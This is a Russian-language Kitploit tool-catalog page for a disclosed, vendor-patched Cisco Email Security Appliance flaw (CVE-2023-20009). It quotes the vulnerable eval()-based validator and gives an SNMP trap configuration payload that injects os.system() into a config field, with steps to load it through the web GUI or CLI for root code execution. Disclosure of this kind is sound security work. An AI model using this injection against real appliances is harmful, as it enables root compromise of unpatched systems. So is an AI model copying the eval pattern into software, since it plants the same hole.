Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cisco-CVE-2023-20009 — Cisco Email Security Appliance: удалённое выполнение кода — RCE из конфигурационного файла | Kitploit
Инструменты/GitHubGitHub/ly1g3/cisco-cve-2023-20009
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubly1g3/cisco-cve-2023-20009

cisco-CVE-2023-20009

Cisco Email Security Appliance: удалённое выполнение кода — RCE из конфигурационного файла

Репозиторий
122 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Обзор

Исследователь безопасности: ly1g3, ly1g3[at]tuta.io

Отпечаток GPG: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586

Обзор: Удаленное выполнение кода - RCE из конфигурационного файла

CVE: CVE-2023-20009

Хронология:

  • Обнаружено - ly1g3
  • Сообщено - ly1g3
  • Исправлено - Cisco

Cisco AsyncOS 14.2.0

ESA (Cisco Secure Email) и Cisco Secure Email and Web Manager

Повышение привилегий - root shell

Аутентифицированный пользователь с правами на SNMP-config может выполнить произвольный код с правами root, используя специально сформированную конфигурацию SNMP trap.

Технические подробности

Используемый код ui_checker.py:

root@kitploit:~
def validate_trap_configuration(base, value_dict):
    validators = eval('read_var_auto_level_wrapper("snmp.%s_traps.configuration_class", non_editable_var=True)' % (base,))
    for k, v in value_dict.iteritems():
        if validators.has_key(k):
            base, conf_class_str = validators[k].rsplit('.', 1)
            module = __import__(base, fromlist=[conf_class_str])
            conf_class = eval('module.%s("%s")' % (conf_class_str, v))
        else:
            raise FilterError('validate_%s_trap_configuration_value' % (base,),
                              _("Trap does not allow configuration"), k)
    return value_dict

v будет содержать значение common_trap.common_configuration

root@kitploit:~
<common_trap>
    <common_name>connectivityFailure</common_name>
    <common_enabled>0</common_enabled>
    <common_configuration>http://asd.asd.&quot;+os.system(&quot;touch test.txt&quot;))#,5</common_configuration>
    </common_trap>
<common_trap>

Шаги для запуска через WEB-GUI:

  1. https://192.168.1.10/system_administration/configuration_file
  2. "Загрузить конфигурационный файл с локального компьютера"
  3. Замените текущее поле connectivityFailure на указанную выше нагрузку

Шаги для запуска через CLI

  1. loadconfig
  2. Вставьте нагрузку
Скачать инструмент